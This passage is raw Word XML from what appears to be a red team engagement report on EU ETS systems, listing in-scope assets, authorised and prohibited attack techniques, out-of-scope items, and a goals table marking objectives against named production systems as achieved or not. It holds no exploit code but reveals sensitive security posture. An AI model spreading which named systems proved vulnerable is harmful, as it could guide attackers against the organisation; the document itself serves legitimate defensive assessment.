      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>CLIMA DWP: Welcome and Net1 users and computers (list will be provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E50F4" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>CLIMA DWP: ETS Central administrators (list will be provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC463D9" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>CLIMA DWP: Network shared drives (S: Drive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2237796A" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>AWS SRV4DEV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A79A1" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc212654647"/>
      <w:bookmarkStart w:id="117" w:name="_Toc213253553"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Authorised actions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="3068E8CF" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Red Team activities on the specified targets can only include the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B82670" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Bypass Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA77D58" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Bypass Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56804699" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Identify and exploit vulnerabilities on the in-scope servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12214D2D" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Establish secure communication channel with the C&amp;C infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A78E9" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Local privilege escalation on the in-scope Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D5A03" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Obtain Administrative access on the Web interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012F6FC" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Spear-phishing targeting DG CLIMA users and developers including external service providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A0FD8" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Social Engineering within limits (no personal phone calls, no personal devices, no personal mappings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E9354" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Lateral movement from workstations and servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F0E54" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc212654648"/>
      <w:bookmarkStart w:id="119" w:name="_Toc213253554"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Restricted actions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="33E587DB" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following RT attacks and techniques are not approved for the current project and will not be executed from the team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799A026" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Denial of Service attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA17F23" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>MiTM attacks and sniffing other user credentials on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97376E" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Brute-forcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D366F5F" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Hail Mary attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45399B78" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="595"/>
          <w:tab w:val="num" w:pos="283"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc184647106"/>
      <w:bookmarkStart w:id="121" w:name="_Toc212654649"/>
      <w:bookmarkStart w:id="122" w:name="_Toc213253555"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Out of scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="4E0E1AC4" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following components are excluded from the Red Team campaign and will not be attacked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E25B8AF" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>ETS member state users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582ABF21" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>ITS, Swiss Registry and any other 3rd party integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF33F9C" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>CLIMA DWP: Any Welcome and Net1 users and computers that do not belong to Unit E3 (not on the provided list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DC2FB8" w14:textId="38481897" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>CLIMA DWP: Any personal devices or accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E427AE" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59642F55" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="00F92F72">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc212654650"/>
      <w:bookmarkStart w:id="124" w:name="_Toc213253556"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Goals and objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="518682A2" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The table below shows the outcome of each goal and objective defined for the Red Team campaign. A result marked as “Success” indicates that the Red Team was able to achieve the objective, demonstrating a potential risk or weakness. Conversely, “Failure” indicates that the Red Team was unable to meet the objective, typically due to effective security controls preventing the intended action.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6839"/>
        <w:gridCol w:w="922"/>
        <w:gridCol w:w="985"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F92F72" w:rsidRPr="001019D3" w14:paraId="35F50815" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:trHeight w:val="106"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="7ABCDF5A" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Goals &amp; Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="3AD17EB3"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defined By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="529" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="11F66E60"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rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F92F72" w:rsidRPr="001019D3" w14:paraId="73CBA624" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1443D1BE" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BHS – ETS service desk SFTP for EUCR extract application (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="08D21DC6"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="7FCCEDCC"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590D58D8" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66B196CE" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AWS – SRV4DEV AWS GitLab code repo/CI system (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45F3540C"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FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="22EC29D3"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F92F72" w:rsidRPr="001019D3" w14:paraId="58AA0B8F" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="70164476"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SHS – TMS database (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="214D5596"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="2ED91291"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5B097C1B" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E8A4059"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DWP – CLIMA Digital Workspace “S:” drive (PROD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="68D3502D"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="0DB7B0E2"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3EDC3AAA" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15EB05E2"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SHS – Union Registry Administration tool or “URA” (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="744D5C0E"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="56D184B0"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40F172A1" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21C366B9"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SHS – EUCR (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="60488E50"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="5A887B5D"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1EBCDBCE" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="09C76E26"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SHS – EUCR, JBPM, EUCR Web services database (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="42D94B3F"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92D050"/>
          </w:tcPr>
          <w:p w14:paraId="25288681"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3646D139" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E49389D"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SHS – EUCR + EUTL Datawarehouse – BI (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A0DC383"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FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="2D1268AF"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F92F72" w:rsidRPr="001019D3" w14:paraId="7F42AC0D" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="55D554C4" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1890"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BHS – EUTL Public + database (ACC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7421D3F8"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Initiator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="529" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="50CDB918"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F92F72" w:rsidRPr="001019D3" w14:paraId="62C8F15D" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3BCF62DD" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Compromise any CLIMA ETS assets not included in the “Out-of-scope” asset list by obtaining unauthorised access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="544" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E1080BE"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529" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="7A27C54C"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F92F72" w:rsidRPr="001019D3" w14:paraId="79CE24BA" w14:textId="77777777" w:rsidTr="00F92F72">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3927" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="51E06742" w14:textId="77777777" w:rsidR="00F92F72" w:rsidRPr="001019D3" w:rsidRDefault="00F92F72" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="ListNumberLevel3"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1582"/>
              </w:tabs>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing w:val="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Obtain administrative access (admin role user access) on the following CLIMA assets:</w:t>
            </w:r>
          </w:p>
